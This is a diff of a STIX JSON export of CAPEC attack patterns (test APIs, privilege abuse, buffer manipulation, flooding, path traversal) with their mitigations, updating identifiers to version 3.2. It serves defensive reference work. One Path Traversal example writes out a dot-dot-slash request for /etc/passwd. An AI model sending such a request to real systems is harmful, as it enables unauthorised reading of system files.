"course-of-action--8d8baedc-2a15-425c-8760-dcb501c425c9", + "id": "relationship--cfe0adac-6b73-4dfe-91b4-5d01f64c0cc9", + "source_ref": "course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--976a21a0-e026-4b8b-b3a7-a48e8edc972e" + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af" }, { "name": "Exploit Test APIs", "description": "An attacker exploits a sample, demonstration, or test API that is insecure by default and should not be resident on production systems. Some applications include APIs that are intended to allow an administrator to test and refine their domain. These APIs should usually be disabled once a system enters a production environment. Testing APIs may expose a great deal of diagnostic information intended to aid an administrator, but which can also be used by an attacker to further refine their attack. Moreover, testing APIs may not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may have many flaws and vulnerabilities that would allow an attacker to severely disrupt a target.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -2958,40 +2981,41 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--968b53a1-f2e6-444f-a74c-851aaff18376" + "id": "attack-pattern--dc538968-9ead-4733-b41b-ef83cb2ed62a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-121-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that production systems to not contain sample or test APIs and that these APIs are only used in development environments.", "type": "course-of-action", - "id": "course-of-action--9e00de61-676c-4669-852e-af3431696338" + "id": "course-of-action--0783cd89-b8b3-4aab-9755-23328a4742a1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--10452c90-efc2-4035-a5c5-96caaaf7aa71", - "source_ref": "course-of-action--9e00de61-676c-4669-852e-af3431696338", + "id": "relationship--3e7a154a-154b-4d77-855d-ff9108b16678", + "source_ref": "course-of-action--0783cd89-b8b3-4aab-9755-23328a4742a1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--968b53a1-f2e6-444f-a74c-851aaff18376" + "target_ref": "attack-pattern--dc538968-9ead-4733-b41b-ef83cb2ed62a" }, { "name": "Privilege Abuse", "description": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -3022,15 +3046,16 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--e543cf01-3318-4c4b-9d4a-ba7ec6ef611a" + "id": "attack-pattern--b0176935-5368-4b4a-9bfd-0f0259bf3309" }, { "name": "Buffer Manipulation", "description": "An adversary manipulates an application's interaction with a buffer in an attempt to read or modify data they shouldn't have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -3063,40 +3088,41 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--56615d27-38d4-47c6-96ae-f36321aa0324" + "id": "attack-pattern--3dd0588e-c5b3-43bb-a544-0e874d4ebc61" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-123-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. Finally, there may be operating system level preventative functionality that can be applied.", "type": "course-of-action", - "id": "course-of-action--f740ba3a-1eb2-40d6-a238-23d50256dcd5" + "id": "course-of-action--910ff626-f0db-4d42-9310-318119856ee6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a41b00e0-18b9-4775-b0a4-15412a9d3fa2", - "source_ref": "course-of-action--f740ba3a-1eb2-40d6-a238-23d50256dcd5", + "id": "relationship--8e9e84d8-f20f-480e-b7ee-8adcb95f5b2c", + "source_ref": "course-of-action--910ff626-f0db-4d42-9310-318119856ee6", "relationship_type": "mitigates", - "target_ref": "attack-pattern--56615d27-38d4-47c6-96ae-f36321aa0324" + "target_ref": "attack-pattern--3dd0588e-c5b3-43bb-a544-0e874d4ebc61" }, { "name": "Shared Data Manipulation", "description": "An adversary exploits a data structure shared between multiple applications or an application pool to affect application behavior. Data may be shared between multiple applications or between multiple threads of a single application. Data sharing is usually accomplished through mutual access to a single memory location. If an adversary can manipulate this shared data (usually by co-opting one of the applications or threads) the other applications or threads using the shared data will often continue to trust the validity of the compromised shared data and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared data, or even cause a crash or compromise of the sharing applications.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -3117,15 +3143,16 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--73c322dd-1380-4164-9e6a-05a1df4722fb" + "id": "attack-pattern--34377bad-4302-44b8-a8a9-1dcebaada4fd" }, { "name": "Flooding", "description": "An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -3162,90 +3189,91 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--174bc145-37b2-4533-bf43-4bd24b641632" + "id": "attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-125-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that protocols have specific limits of scale configured.", "type": "course-of-action", - "id": "course-of-action--c90f663e-8f51-4d09-b41a-8462070a084a" + "id": "course-of-action--61b2e7d2-67dd-4305-9afd-b015b4174c88" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b0525d8f-59a8-4d10-b935-a7ea0b153de6", - "source_ref": "course-of-action--c90f663e-8f51-4d09-b41a-8462070a084a", + "id": "relationship--83538c7f-410a-4fb8-8b6a-3de168066b99", + "source_ref": "course-of-action--61b2e7d2-67dd-4305-9afd-b015b4174c88", "relationship_type": "mitigates", - "target_ref": "attack-pattern--174bc145-37b2-4533-bf43-4bd24b641632" + "target_ref": "attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-125-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits.", "type": "course-of-action", - "id": "course-of-action--813db275-4bbd-4d63-abb8-18c0450dc2f9" + "id": "course-of-action--060932fa-a809-49e7-9a4c-05e6c3f99f31" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dacf6de9-0d9d-451b-ba5a-6e3757d2c9df", - "source_ref": "course-of-action--813db275-4bbd-4d63-abb8-18c0450dc2f9", + "id": "relationship--f9e4c464-be58-41c0-9a77-ccfdc854a000", + "source_ref": "course-of-action--060932fa-a809-49e7-9a4c-05e6c3f99f31", "relationship_type": "mitigates", - "target_ref": "attack-pattern--174bc145-37b2-4533-bf43-4bd24b641632" + "target_ref": "attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-125-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", "type": "course-of-action", - "id": "course-of-action--5a41db19-91a8-409e-a852-4cc0a56747d7" + "id": "course-of-action--859d96fc-2041-40a9-ad0d-abfeeda1de40" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3c61153b-a82b-4a62-bc09-c50a8b72adb9", - "source_ref": "course-of-action--5a41db19-91a8-409e-a852-4cc0a56747d7", + "id": "relationship--f42cc4b9-2a4a-4f0e-90f9-b6004443f1d0", + "source_ref": "course-of-action--859d96fc-2041-40a9-ad0d-abfeeda1de40", "relationship_type": "mitigates", - "target_ref": "attack-pattern--174bc145-37b2-4533-bf43-4bd24b641632" + "target_ref": "attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e" }, { "name": "Path Traversal", "description": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", @@ -3319,315 +3347,316 @@ "\n An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request\n http://example/../../../../../etc/passwd\n From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "id": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Configure the access control correctly.", "type": "course-of-action", - "id": "course-of-action--1fb1a11a-10a7-482c-9ed6-51b44f703314" + "id": "course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--77300354-b389-46ff-9cd1-af2c17a0a419", - "source_ref": "course-of-action--1fb1a11a-10a7-482c-9ed6-51b44f703314", + "id": "relationship--1bb26593-39f0-4a1c-a8d8-d8118c3831ed", + "source_ref": "course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Enforce principle of least privilege.", "type": "course-of-action", - "id": "course-of-action--c5869033-4f79-40b2-b258-ba163252e1fb" + "id": "course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a4158316-920e-4f77-80d2-81a0ea8a3444", - "source_ref": "course-of-action--c5869033-4f79-40b2-b258-ba163252e1fb", + "id": "relationship--87adce17-6faa-4dd1-b494-2aad494d524d", + "source_ref": "course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.", "type": "course-of-action", - "id": "course-of-action--08f4e02a-825e-40af-9045-9c00f57141b8" + "id": "course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b2a9e106-b3fa-46c4-86f7-3c1baf38d7a2", - "source_ref": "course-of-action--08f4e02a-825e-40af-9045-9c00f57141b8", + "id": "relationship--7dc7508c-c157-4f37-8dce-a9e510510a67", + "source_ref": "course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.", "type": "course-of-action", - "id": "course-of-action--ec6aafde-0dce-4ca1-9066-165a5e8e182d" + "id": "course-of-action--15af2ba6-0fe3-42ae-aa07-efeaba06d2d6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--caea3673-4d92-4620-8514-91832e2e6e4d", - "source_ref": "course-of-action--ec6aafde-0dce-4ca1-9066-165a5e8e182d", + "id": "relationship--7a278d54-2787-42e3-9f18-7b64e39e6379", + "source_ref": "course-of-action--15af2ba6-0fe3-42ae-aa07-efeaba06d2d6", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.", "type": "course-of-action", - "id": "course-of-action--50263c48-f3f5-4eca-b2b3-24bd8021be9d" + "id": "course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--bdd4ec03-a423-44e3-9359-1814dfb96d27", - "source_ref": "course-of-action--50263c48-f3f5-4eca-b2b3-24bd8021be9d", + "id": "relationship--3805a6cc-3536-47fa-91db-037018a0ef61", + "source_ref": "course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.", "type": "course-of-action", - "id": "course-of-action--06e73535-1dbe-476e-89d0-45b6466eece6" + "id": "course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2a940280-5875-4bf6-9904-03152d88abd8", - "source_ref": "course-of-action--06e73535-1dbe-476e-89d0-45b6466eece6", + "id": "relationship--d85cb99b-75fc-40b8-b479-a285d0aeb85a", + "source_ref": "course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-6", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.", "type": "course-of-action", - "id": "course-of-action--f1521ff8-975a-4136-845c-402ee9caf052" + "id": "course-of-action--6593210b-d532-485d-8aad-22672f5f04a2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d964d21e-f306-4e36-af62-79b831e7d93a", - "source_ref": "course-of-action--f1521ff8-975a-4136-845c-402ee9caf052", + "id": "relationship--4fbb06d8-f344-4a8e-943f-df784ff2b3f8", + "source_ref": "course-of-action--6593210b-d532-485d-8aad-22672f5f04a2", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-7", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Perform input validation for all remote content, including remote and user-generated content.", "type": "course-of-action", - "id": "course-of-action--72ce3172-3c82-41af-ab0d-889a1f4d31b6" + "id": "course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b80bba48-e92e-49ad-8629-0963e1598100", - "source_ref": "course-of-action--72ce3172-3c82-41af-ab0d-889a1f4d31b6", + "id": "relationship--92c11af4-116d-4550-ba14-1b9ab2fd48a0", + "source_ref": "course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-8", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.", "type": "course-of-action", - "id": "course-of-action--868ce927-2671-4b33-b1c3-43a0804db42e" + "id": "course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7" }, { - 